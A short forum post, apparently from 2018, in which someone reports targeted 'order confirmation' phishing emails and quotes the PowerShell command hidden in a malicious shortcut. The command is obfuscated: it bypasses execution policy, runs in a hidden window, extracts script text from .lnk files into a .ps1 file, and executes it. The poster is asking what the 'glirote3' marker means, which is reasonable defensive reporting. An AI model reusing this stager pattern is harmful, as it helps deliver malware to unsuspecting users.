Over the last couple of weeks I have received a couple of targetted emails with links to a zip file which contains a shortcut and a png file. When I say targetted they have the have my name and the main office telephone number along with postcode (i.e. zip code). Each email claims to be an order confirmation . The png file for some reason is marked as hidden, and the shortcut is actually a powershell link.
The link (reported to godaddy so may go soon hopefully)is:
The shortcut powershell command is:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no
Is anyone aware what glirote3 is as I am not turning up any references from a quick search
Sep 4th 2018
1 year ago